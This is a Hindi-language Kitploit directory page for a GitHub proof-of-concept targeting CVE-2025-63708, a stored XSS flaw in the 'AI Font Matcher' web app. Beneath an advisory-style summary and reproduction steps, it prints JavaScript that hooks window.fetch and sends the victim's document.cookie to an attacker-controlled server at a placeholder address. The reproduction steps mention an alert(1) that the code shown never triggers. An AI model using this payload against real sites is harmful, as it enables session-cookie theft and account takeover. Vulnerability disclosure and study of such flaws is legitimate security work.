Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-63708 — CVE-2025-63708 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, AI Font Matcher में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (stored XSS) कमजोरी। यह वेबफ़ॉन्ट्स फ़ेच प्रतिक्रियाओं में अनसैनिटाइज़्ड फ़ॉन्ट फ़ैमिली नामों के माध्यम से सत्र कुकी चोरी का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/dylandavis1/cve-2025-63708
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

CVE-2025-63708 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, AI Font Matcher में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (stored XSS) कमजोरी। यह वेबफ़ॉन्ट्स फ़ेच प्रतिक्रियाओं में अनसैनिटाइज़्ड फ़ॉन्ट फ़ैमिली नामों के माध्यम से सत्र कुकी चोरी का प्रदर्शन करता है।

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-63708

CVE ID: CVE-2025-63708
निर्धारित तिथि: 11-12-2025 समस्या प्रकार: CWE-79 (क्रॉस-साइट स्क्रिप्टिंग)
प्रभावित उत्पाद: "AI Font Matcher" (पोस्ट दिनांक 2025-10-10, nid=18425)
उत्पाद पृष्ठ: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
खोज तिथि: 2025-10-11
शोधकर्ता: Dylan Davis

सारांश

एप्लिकेशन webfonts फ़ेच से डेटा को फ़ॉन्ट परिवार नामों को सैनिटाइज़ किए बिना संसाधित करता है। उस प्रतिक्रिया को नियंत्रित या इंटरसेप्ट करने वाला हमलावर ऐसा जावास्क्रिप्ट इंजेक्ट कर सकता है जो पृष्ठ संदर्भ में निष्पादित होता है, जिससे सत्र कुकी चोरी और खाता अधिग्रहण संभव होता है।

प्रभाव

  • पीड़ित के ब्राउज़र में मनमाना जावास्क्रिप्ट निष्पादन
  • सत्र कुकीज़ का बहिर्गमन (मेरे परीक्षण के दौरान गैर-HttpOnly कुकीज़ देखी गईं)
  • खाता अपहरण और उपयोगकर्ता की ओर से कार्रवाई

प्रभावित संस्करण / दायरा

  • SourceCodester पर 2025-10-10 तक वितरित "AI Font Matcher" पैकेज।

पुनरुत्पादन (PoC)

यह PoC window.fetch को हुक करके और नियंत्रित वेब फ़ॉन्ट पेलोड लौटाकर कोड निष्पादन प्रदर्शित करता है।

  1. डाउनलोड किए गए स्रोत से ऐप को स्थानीय रूप से चलाएं।
  2. DevTools → कंसोल खोलें और नीचे दिया गया PoC पेस्ट करें (या poc.js लोड करें)।
  3. उस UI को ट्रिगर करें जो webfonts फ़ेच करता है; alert(1) दिखता है।
root@kitploit:~
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // Exfiltrate cookie to your server
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Exfil failed:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
टूल डाउनलोड करें